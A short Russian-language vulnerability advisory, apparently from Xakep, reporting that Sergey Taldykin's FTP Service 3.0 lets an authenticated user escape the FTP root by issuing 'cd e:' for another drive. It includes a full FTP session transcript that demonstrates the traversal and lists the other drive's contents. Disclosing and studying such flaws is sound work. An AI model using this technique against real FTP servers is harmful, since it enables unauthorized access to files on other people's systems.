Xakep #305. Многошаговые SQL-инъекции
Уязвимость обнаружена в FTP сервере от Сергея Тадыкина. Удаленный авторизованный пользователь может просматривать файлы на системе, расположенные вне FTP директории.
Damage Hacking Group сообщает, что удаленный авторизованный пользователь может выполнить CD команду с другим именем диска (например "cd e") и просматривать файлы на этом диске. Пример:
C:\>ftp 127.0.0.1
Connected to 127.0.0.1.
220-
220 Service ready for new user.
User (127.0.0.1:(none)):
230 User logged in, proceed.
ftp> pwd
257 "/" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp> cd e:
250 Requested file action okay, completed.
ftp> pwd
257 "e:" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
03-05-03 12:58PM <DIR> video
05-21-03 05:46PM 267964416 hiberfil.sys
02-18-03 04:18AM <DIR> Documents and Settings
03-11-03 12:00PM <DIR> Program Files
...
226 Closing data connection.
ftp: 579 bytes received in 0,00Seconds 579000,00Kbytes/sec.
ftp> bye
221-
221 Service closing control connection.
C:\>
Уязвимость обнаружена в Sergey Taldykin's FTP Service 3.0.